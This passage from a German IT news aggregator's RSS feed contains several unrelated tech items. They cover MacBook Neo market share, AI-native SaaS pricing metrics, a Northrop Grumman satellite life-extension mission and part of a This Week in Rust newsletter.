<pubDate>Thu, 23 Jul 2026 15:22:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” Counterpoint said. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:05:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Private Mission Launches To Extend Life of Out-of-Gas Communication Satellites]]></title>
<description><![CDATA[Northrop Grumman has launched a private satellite-servicing mission to attach life-extending "jetpacks" to aging communications satellites in geosynchronous orbit. "It's the second satellite-saving mission to launch this month, all part of a growing, money-saving effort to keep spacecraft running...]]></description>
<link>https://tsecurity.de/de/3688235/it-security-nachrichten/private-mission-launches-to-extend-life-of-out-of-gas-communication-satellites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688235/it-security-nachrichten/private-mission-launches-to-extend-life-of-out-of-gas-communication-satellites/</guid>
<pubDate>Thu, 23 Jul 2026 09:10:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Northrop Grumman has launched a private satellite-servicing mission to attach life-extending "jetpacks" to aging communications satellites in geosynchronous orbit. "It's the second satellite-saving mission to launch this month, all part of a growing, money-saving effort to keep spacecraft running as long as possible," reports Phys.org. From the report: Launched by SpaceX, Northrop Grumman's mission robotic vehicle -- dubbed MRV -- and its jetpacks will spend the next year angling into the proper orbit 22,300 miles (36,000 kilometers) above Earth. Hundreds of satellites orbit at this so-called geosynchronous orbit, where they match the speed of Earth's rotation and keep to the same part of the sky for continuous coverage. Once in place by mid-2027, the minivan-sized spacecraft will use its 10-foot (9-meter) arms to attach a jetpack to an aging communication satellite. Then it will zip off to two more satellites in need.
 
For its debut flight, the spacecraft was accompanied by three electric-propelled jetpacks that peeled away separately following liftoff. Like the MRV, the jetpacks will use their own xenon gas thrusters to get to the desired orbit. Once in place, the jetpacks will wait for the robot to grab them, one at a time, and plug them into their designated satellites. Each jetpack -- the size of a washing machine -- will provide the necessary oomph for an out-of-gas satellite to keep operating for several more years instead of retiring. If it works, it will be a boon for satellite operators SES of Luxembourg and Optus of Australia, saving them millions of dollars in replacement costs.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Private+Mission+Launches+To+Extend+Life+of+Out-of-Gas+Communication+Satellites%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0534215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0534215%2Fprivate-mission-launches-to-extend-life-of-out-of-gas-communication-satellites%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/23/0534215/private-mission-launches-to-extend-life-of-out-of-gas-communication-satellites?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 661]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688059/tools/this-week-in-rust-this-week-in-rust-661/</guid>
<pubDate>Thu, 23 Jul 2026 07:18:12 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/16/Rust-1.97.1/">Announcing Rust 1.97.1</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-76">The Embedded Rustacean Issue #76</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://tokio.rs/blog/2026-07-22-announcing-topcoat">Announcing Topcoat: a framework for building full-stack reactive web apps with Rust</a></li>
<li><a href="https://github.com/dtolnay/syn/releases/tag/3.0.0">Syn 3.0.0</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/07/22/whats-new-in-rustrover-2026-2/">What’s New in RustRover 2026.2</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.35.0">kobe 0.35.0: readiness gates and cert recycling</a></li>
<li><a href="https://github.com/Eoin-McMahon/comhad/releases/tag/v0.1.0">Comhad v0.1.0: a ranger-style tui cyberduck replacement for browsing S3</a></li>
<li><a href="https://github.com/bigduu/Nova/releases/tag/v0.2.1">Nova v0.2.1: computer-use MCP server</a></li>
<li><a href="https://github.com/rust-windowing/winit/pull/4571">winit now has comprehensive cross-platform drag-and-drop support, exposing most of the power of the underlying OS APIs</a></li>
<li><a href="https://github.com/singhpratech/crimson-crab/releases/tag/v0.1.0">crimson-crab v0.1.0 - a production-grade Rust SDK for the Claude API (streaming, tool use, prompt caching, batches)</a></li>
<li><a href="https://singhpratech.github.io/ferrovec/">ferrovec: dependency-light HNSW vector search in Rust, compiled to WebAssembly for private in-browser semantic search</a></li>
<li><a href="https://github.com/ordokr/ordofp/releases/tag/v0.1.0">OrdoFP 0.1.0 released — a functional-programming toolbelt for Rust (HList, GAT type classes, optics, effects, monad transformers)</a></li>
<li><a href="https://freyaui.dev/posts/0.4">Freya 0.4</a></li>
<li><a href="https://dev.to/nabsei/buildline-merging-cargo-and-ninjas-build-profiling-into-one-timeline-2373">buildline: merging cargo and ninja's build profiling into one timeline</a></li>
<li><a href="https://richer-richard.github.io/cochlea/determinism.html#030-additions-2026-07-22">cochlea 0.3.0: melody read-back, MFCC timbre, a master limiter, and MIDI import for the deterministic agent-audio engine</a></li>
<li><a href="https://flodl.dev/blog/then-the-cpu-died">flodl 0.6.0: multi-host heterogeneous DDP - mismatched GPUs across hosts beat the fastest card alone</a></li>
<li><a href="https://hongnoul.github.io/hwatu/">hwatu: a daemon-based WebKitGTK browser for tiling WMs with ~13ms window spawn</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.11.0">kache 0.11.0: broader compiler coverage and libc-aware keys</a></li>
<li><a href="https://mladedav.github.io/blog/blog/tracing-reload/"><code>tracing-reload</code> - reload layer without panics</a></li>
<li><a href="https://www.opentypeless.com/en/blog/introducing-talkmore">Introducing OpenTypeless: Voice Input That Actually Works</a></li>
<li><a href="https://dev.to/booyaka101/reading-a-rust-crates-capabilities-out-of-its-compiled-symbols-58pb">Reading a Rust crate's capabilities out of its compiled symbols</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://smallcultfollowing.com/babysteps/blog/2026/07/15/battery-packs/">Battery packs: Let's talk about crates, baby</a></li>
<li><a href="https://blog.yoshuawuyts.com/capture-clauses-as-effects">Capture Clauses as Effects</a></li>
<li><a href="https://corrode.dev/blog/hardening-rust/">Hardening Rust Code For Production</a></li>
<li><a href="https://pranitha.dev/posts/tokio-gives-progress-not-ordering/">Tokio Gives Progress, Not Ordering: Scheduling 1M Tasks</a></li>
<li><a href="https://kerkour.com/rust-service-hardening-and-production-checklist">Rust service hardening and production checklist</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e08-rust-foundation/">The Rust Foundation with Rebecca Rumbul, Lori Lorusso, and David Wood, Rust Foundation leadership and board</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=bAINppA0BSU">Jon Gjengset: Open Source Maintenance 2026-07-18</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=lUoQ3uGSQA0">Rust Release Changelog - 1.97.0</a></li>
<li>[video] <a href="https://www.youtube.com/live/Doqwh1b4QyA">Livestream: Rust in Ubuntu</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://kriyanative.com/blog/13-chain-breaks/">I hash-chained my agent's audit log. Then I found 13 breaks in it — all mine, all benign.</a></li>
<li><a href="https://dev.to/scripthpp/two-bugs-i-only-found-by-running-my-rust-sync-daemon-against-real-infrastructure-4278">Two tricky bugs in a Rust daemon</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=u91eX3J6lPU">Backend Concepts in Rust: Securely Managing App Secrets</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=tIrSvJFRxAg">Build with Naz - Ep 21: High Performance Flat 2D Arrays in Rust (SIMD, L1 cache)</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/medialab/xan">xan</a>, a TUI toolkit to work with CSV files.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1630">Simeon H.K. Fitch</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><em>No Calls for participation were submitted this week.</em></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>


<ul>
<li><em>No Calls for papers or presentations were submitted this week.</em></li>
</ul>
<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>576 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-14..2026-07-21">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159256">account for async closures when pointing at lifetime in return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157824">comptime inherent impls</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159115"><code>dep_graph</code>: deduplicate task reads with an epoch-filtered index recorder</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158976">eagerly check for ambiguity in macro parsing</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158608">implement <code>#[diagnostic::opaque]</code> attribute to hide backtraces of macros</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158720">shrink <code>ast::Expr64</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159467">add explicit <code>Iterator::count</code> impl for <code>str::EncodeUtf16</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159296">implement <code>bool::toggle</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159528">implement <code>const_binary_search</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159302">implement <code>Debug</code> helpers via <code>Cell</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156220">implement <code>VecDeque::truncate_to_range</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158061">make <code>pin!()</code> more foolproof</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158546">move <code>std::io::BufRead</code> to <code>alloc::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158544">move <code>std::io::Read</code> to <code>alloc::io</code></a></li>
